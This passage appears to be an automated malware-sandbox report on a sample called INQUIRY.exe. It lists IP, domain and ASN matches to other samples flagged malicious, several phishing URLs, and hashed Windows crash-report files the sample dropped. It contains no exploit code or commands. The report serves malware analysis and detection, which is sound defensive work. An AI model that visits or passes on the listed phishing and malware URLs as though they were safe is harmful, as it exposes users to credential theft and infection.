                                                                      15:02:22API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      104.16.154.36c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      6JLHKYvboo.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      khJdbt0clZ.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      ZMOKwXqVHO.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      5Av43Q5IXd.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      8oaZfXDstn.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      9vdouqRTh3.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      M9RhKQ1G91.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      0CyK3Y7XBs.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      pwYhlZGMa6.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      Vll6ZcOkEQ.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      oLHQIQAI3N.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      YrHUxpftPs.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      WuGzF7ZJ7P.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      cj9weNQmT2.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      lk5M5Q97c3.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      2v7Vtqfo81.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      Enquiry_pdf.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      KM4ukzS8ER.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/
                                                                      kYr85V73sJ.exeGet hashmaliciousBrowse
                                                                      • whatismyipaddress.com/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      whatismyipaddress.comPrueba de pago.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      879mgDuqEE.jarGet hashmaliciousBrowse
                                                                      • 66.171.248.178
                                                                      remittance1111.jarGet hashmaliciousBrowse
                                                                      • 66.171.248.178
                                                                      879mgDuqEE.jarGet hashmaliciousBrowse
                                                                      • 66.171.248.178
                                                                      remittance1111.jarGet hashmaliciousBrowse
                                                                      • 66.171.248.178
                                                                      https://my-alliances.co.uk/Get hashmaliciousBrowse
                                                                      • 66.171.248.178
                                                                      c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      6JLHKYvboo.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      jSMd8npgmU.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      khJdbt0clZ.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      ZMOKwXqVHO.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      5Av43Q5IXd.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      8oaZfXDstn.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      RXk6PjNTN8.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      9vdouqRTh3.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      5pB35gGfZ5.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      M9RhKQ1G91.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      0CyK3Y7XBs.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      pwYhlZGMa6.exeGet hashmaliciousBrowse
                                                                      • 104.16.154.36
                                                                      mail.iigcest.comVll6ZcOkEQ.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57
                                                                      x2rzwu7CQ3.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57
                                                                      X62RG9z7kY.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57
                                                                      SWIFT100892220-PDF.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57
                                                                      SWIFT0079111-pdf.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57
                                                                      AD1-2001328L_pdf.exeGet hashmaliciousBrowse
                                                                      • 166.62.27.57

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUSShippingDoc.jarGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      SecuriteInfo.com.Mal.Generic-S.5505.exeGet hashmaliciousBrowse
                                                                      • 172.67.135.77
                                                                      Mailbox-Terms&Conditions.jarGet hashmaliciousBrowse
                                                                      • 104.20.23.46
                                                                      ant.exeGet hashmaliciousBrowse
                                                                      • 104.27.160.64
                                                                      List Of Orders.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Mailbox-Terms&Conditions.jarGet hashmaliciousBrowse
                                                                      • 104.20.23.46
                                                                      https://aaqkagzimdeymd.nicepage.io/CEREA-PARTNERS.html?version=25fbab78-b58c-47ae-9818-2632bfb7ce1f&uid=a3c290bf-b6ac-425a-b7f8-c2d16638c672Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      Prueba de pago.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      a66a5257bb6ee2e690450c48a91815d4.exeGet hashmaliciousBrowse
                                                                      • 104.23.99.190
                                                                      D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      u82lb18JnW.exeGet hashmaliciousBrowse
                                                                      • 104.31.92.240
                                                                      https://agrabadconventionhall.com/redirect-outlook.com/server%20configuration/?#info@herbertarchitekten.deGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      https://agrabadconventionhall.com/redirect-outlook.com/server configuration/Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                      • 172.67.214.161
                                                                      http://cricketventures.comGet hashmaliciousBrowse
                                                                      • 104.26.13.251
                                                                      https://www.chm-endurance.com/Get hashmaliciousBrowse
                                                                      • 104.22.24.131
                                                                      https://bitly.com/35yFnnsGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      https://email.ofificeshareserver1.ml/e/c/eyJlbWFpbF9pZCI6IlJPS0xCZ01BQVhYVjZXVUFLRTFaMUpQWmZrTU1mUT09IiwiaHJlZiI6Imh0dHBzOi8vZmlyZWJhc2VzdG9yYWdlLmdvb2dsZWFwaXMuY29tL3YwL2Ivc2l0ZXMtMDAuYXBwc3BvdC5jb20vby9zaGFyZS1wb2ludCUyRnJlZGlyZWN0Lmh0bWw_YWx0PW1lZGlhXHUwMDI2dG9rZW49ZWM5NWIwZjItNTE4Ny00YzA3LWExNGUtMDA2OWE0ZWI0ODcxXHUwMDI2ZW1haWw9bWFya3VzLm5pZXRoQGp1bGl1c2JhZXIuY29tIiwibGlua19pZCI6MSwicG9zaXRpb24iOjB9/1b8972b4385f4f0bcb49ca81c6f33c388775dae940b9f44c90bdf57423203612Get hashmaliciousBrowse
                                                                      • 104.31.71.251
                                                                      https://j.mp/38NwiZZGet hashmaliciousBrowse
                                                                      • 104.27.187.65
                                                                      AS-26496-GO-DADDY-COM-LLCUSmoses.exeGet hashmaliciousBrowse
                                                                      • 148.66.138.196
                                                                      PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      https://j.mp/38NwiZZGet hashmaliciousBrowse
                                                                      • 107.180.26.71
                                                                      POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                                                      • 198.71.233.138
                                                                      https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                                                      • 198.71.233.138
                                                                      anthony.exeGet hashmaliciousBrowse
                                                                      • 107.180.4.22
                                                                      https://sailingfloridakeys.com/Guarantee/Get hashmaliciousBrowse
                                                                      • 104.238.92.18
                                                                      oX3qPEgl5x.exeGet hashmaliciousBrowse
                                                                      • 198.71.232.3
                                                                      https://rfpforsubmission.typeform.com/to/Vtnb9OBCGet hashmaliciousBrowse
                                                                      • 148.72.93.116
                                                                      udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                      • 198.12.231.132
                                                                      4WD28ZoLXN.exeGet hashmaliciousBrowse
                                                                      • 166.62.110.232
                                                                      AgvxMpx2Dv.exeGet hashmaliciousBrowse
                                                                      • 132.148.26.76
                                                                      Untitled 20201030.docGet hashmaliciousBrowse
                                                                      • 198.71.233.96
                                                                      eLaaw7SqMi.exeGet hashmaliciousBrowse
                                                                      • 68.178.213.243
                                                                      https://www.coalesceresearchgroup.com/coalesceinternational.com/acceount/Get hashmaliciousBrowse
                                                                      • 148.72.22.210
                                                                      jrzlwOa0UC.exeGet hashmaliciousBrowse
                                                                      • 107.180.2.103
                                                                      p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      wHRBHjmaGw.exeGet hashmaliciousBrowse
                                                                      • 132.148.26.76
                                                                      CLOUDFLARENETUSShippingDoc.jarGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      SecuriteInfo.com.Mal.Generic-S.5505.exeGet hashmaliciousBrowse
                                                                      • 172.67.135.77
                                                                      Mailbox-Terms&Conditions.jarGet hashmaliciousBrowse
                                                                      • 104.20.23.46
                                                                      ant.exeGet hashmaliciousBrowse
                                                                      • 104.27.160.64
                                                                      List Of Orders.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Mailbox-Terms&Conditions.jarGet hashmaliciousBrowse
                                                                      • 104.20.23.46
                                                                      https://aaqkagzimdeymd.nicepage.io/CEREA-PARTNERS.html?version=25fbab78-b58c-47ae-9818-2632bfb7ce1f&uid=a3c290bf-b6ac-425a-b7f8-c2d16638c672Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      Prueba de pago.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      a66a5257bb6ee2e690450c48a91815d4.exeGet hashmaliciousBrowse
                                                                      • 104.23.99.190
                                                                      D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      u82lb18JnW.exeGet hashmaliciousBrowse
                                                                      • 104.31.92.240
                                                                      https://agrabadconventionhall.com/redirect-outlook.com/server%20configuration/?#info@herbertarchitekten.deGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      https://agrabadconventionhall.com/redirect-outlook.com/server configuration/Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                      • 172.67.214.161
                                                                      http://cricketventures.comGet hashmaliciousBrowse
                                                                      • 104.26.13.251
                                                                      https://www.chm-endurance.com/Get hashmaliciousBrowse
                                                                      • 104.22.24.131
                                                                      https://bitly.com/35yFnnsGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      https://email.ofificeshareserver1.ml/e/c/eyJlbWFpbF9pZCI6IlJPS0xCZ01BQVhYVjZXVUFLRTFaMUpQWmZrTU1mUT09IiwiaHJlZiI6Imh0dHBzOi8vZmlyZWJhc2VzdG9yYWdlLmdvb2dsZWFwaXMuY29tL3YwL2Ivc2l0ZXMtMDAuYXBwc3BvdC5jb20vby9zaGFyZS1wb2ludCUyRnJlZGlyZWN0Lmh0bWw_YWx0PW1lZGlhXHUwMDI2dG9rZW49ZWM5NWIwZjItNTE4Ny00YzA3LWExNGUtMDA2OWE0ZWI0ODcxXHUwMDI2ZW1haWw9bWFya3VzLm5pZXRoQGp1bGl1c2JhZXIuY29tIiwibGlua19pZCI6MSwicG9zaXRpb24iOjB9/1b8972b4385f4f0bcb49ca81c6f33c388775dae940b9f44c90bdf57423203612Get hashmaliciousBrowse
                                                                      • 104.31.71.251
                                                                      https://j.mp/38NwiZZGet hashmaliciousBrowse
                                                                      • 104.27.187.65

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_0466ea22\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19244
                                                                      Entropy (8bit):3.7689860404632216
                                                                      Encrypted:false
                                                                      SSDEEP:192:OYcm0I9+HzHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS27P:X4HziBUZMXIjB7vqsSt/u7sSX4It5a8
                                                                      MD5:C8F2F641B01A44390EE72AB0291023BB
                                                                      SHA1:73DD3194D00A241D6506AC88E94A31C0872AAD9E
                                                                      SHA-256:253F7456400E5CD904BCCB71A341A89DDED83968C28A9ECDED505C38833040EE
                                                                      SHA-512:D10C15F5E4E81ACB4489DFD0CD212672A3396CF5CCCC38D76A5225B0E68B72EC05B22D9F2C08377CE5736CEAE4D545DB1C0DCF44A99D889EA64C797035DA4CE5
                                                                      Malicious:true
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.8.7.2.5.3.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.8.3.6.3.1.5.7.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.4.7.1.9.9.a.-.f.e.7.9.-.4.4.6.d.-.a.c.8.3.-.2.3.0.d.3.d.4.9.4.3.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.5.9.2.d.1.2.-.6.6.c.3.-.4.7.1.1.-.b.5.4.7.-.6.5.2.b.0.d.3.e.5.c.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q.U.I.R.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.8.-.0.0.0.1.-.0.0.1.b.-.6.1.2.3.-.c.6.7.6.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_1a2a4622\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19246
                                                                      Entropy (8bit):3.7687586959631867
                                                                      Encrypted:false
                                                                      SSDEEP:192:cg/3+HVHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274ItF:B/uHViBUZMXIjB7vqsSt/u7sSX4It5a0
                                                                      MD5:0F2339E59B1382CFEBA7C65E0204DB37
                                                                      SHA1:869CD3F293F945FE0B794C50EF4899CCC318B52C
                                                                      SHA-256:EBD1A41084A86F927C8E65CD72B32DC6B9A5E16C62205A82F52EC9B364A79947
                                                                      SHA-512:1C8564A5E898644CBCF53664A1D39E26ADF5BE1DBA3DB233E2C325BA846520DACDFAC2DF7243F21C9AF1F78A9F2CCB035C1C2BCFB919FD0B1A8CEF54D657D231
                                                                      Malicious:true
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.3.1.8.8.1.7.4.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.4.1.3.3.4.8.3.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.d.d.f.0.9.-.6.b.6.0.-.4.1.9.c.-.a.1.3.4.-.4.f.2.8.d.1.1.b.2.7.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.f.0.8.8.e.c.-.c.a.5.c.-.4.4.9.4.-.8.6.f.d.-.f.b.f.f.c.f.f.8.d.b.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q.U.I.R.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_009f3881\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7579185842846132
                                                                      Encrypted:false
                                                                      SSDEEP:192:EZ+HLTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274ItZ:HHLVjB7vqsSt/u7srX4ItZ
                                                                      MD5:FBCEA239031271D5FC498B4CCFF7FFC5
                                                                      SHA1:A317C75282FB18400F1DA04EE684D29A375F5919
                                                                      SHA-256:96D8D97D8A8C4F15EE1E0D1B75A78F8BEEBF3845EDD82E72E8D46F7F92F6B92E
                                                                      SHA-512:6DF096B4314D9F1E9E7672055DA379DE2270F970E3F5F2CE1026322C9CD0F52927DC652D3806CCCCA12662BD9121B0A8BC1528306CB63976184EF87AA99F2261
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.2.7.7.2.1.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.3.9.2.8.3.7.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.1.4.c.0.8.c.-.3.3.4.9.-.4.a.e.4.-.8.5.a.7.-.e.5.4.9.3.b.5.0.4.7.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.f.0.-.0.0.0.1.-.0.0.1.b.-.1.3.6.7.-.d.8.8.e.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.1.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_18bf7163\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18448
                                                                      Entropy (8bit):3.7581897365137853
                                                                      Encrypted:false
                                                                      SSDEEP:192:21+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274Itu:VH0VjB7vqsSt/u7srX4Itu
                                                                      MD5:5856CBF6D7376E0047754E49722CDE9A
                                                                      SHA1:051FCA316BE423B3D5475C843573239C084BB0AE
                                                                      SHA-256:AC6415AD3FD401C7E0B4547121023266CF2ABBC2F75A35FCCB2763DB2B36AEF3
                                                                      SHA-512:560A4FF5B36ED1ABA6F86856AE12A665208CED8A67893FC36246CC049C7B0DD9872AB2DC26E552D40E24A384B3441555442CE3505138F61EC24DDFE832C1A25F
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.5.4.4.3.9.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.8.5.0.6.4.5.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.3.8.0.2.4.7.-.2.d.d.b.-.4.4.5.7.-.9.b.1.5.-.f.1.3.e.e.5.6.2.1.6.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.f.b.5.c.-.2.0.9.8.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.6.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1a860a22\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7573567572608084
                                                                      Encrypted:false
                                                                      SSDEEP:192:2Mlg+HPTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7stS274Itw:bNHPVjB7vqsSt/u7stX4Itw
                                                                      MD5:BEA478764A49288FAE5D2C58DEA9E7F7
                                                                      SHA1:8601AF0DC1CFDBA1A6FD96882B78E44800F059AF
                                                                      SHA-256:D55EC04B23C4335716973DD1BE81A228576593188597B2FF2422E7CA596DAC57
                                                                      SHA-512:15AA099538B4D44703D965C393892452B5D204568CFE062308F35741F8C10FC87738AFF0CE2AEE3B2D9C3E2770C774C4216A053554CF554073FD0335AC46035B
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.0.5.3.8.0.2.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.2.1.3.1.7.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.e.5.1.0.d.1.-.c.c.b.4.-.4.5.8.4.-.8.e.d.d.-.e.d.1.2.8.8.9.c.0.1.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.6.2.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1b4a9849\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7581638227883536
                                                                      Encrypted:false
                                                                      SSDEEP:192:B8y+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274Itj:kH0VjB7vqsSt/u7sSX4Itj
                                                                      MD5:4E9027E389CF59A8E643336BC538513A
                                                                      SHA1:5FC1F51DA07FA44C69EF4DC8C46AF896176E76F0
                                                                      SHA-256:5E35F7BEAF0E442F1923D24380FE8A32309325B08F6C6815AC221527631AEBEF
                                                                      SHA-512:77A94A00184189C927B7EF97D7308D0E5B629B080DF48CA7DB95BF8C0210E2E37F06377AD55CE8187E4E60F07AB2099AAC49A6B52D76EC1BFF39BC666F852C77
                                                                      Malicious:false
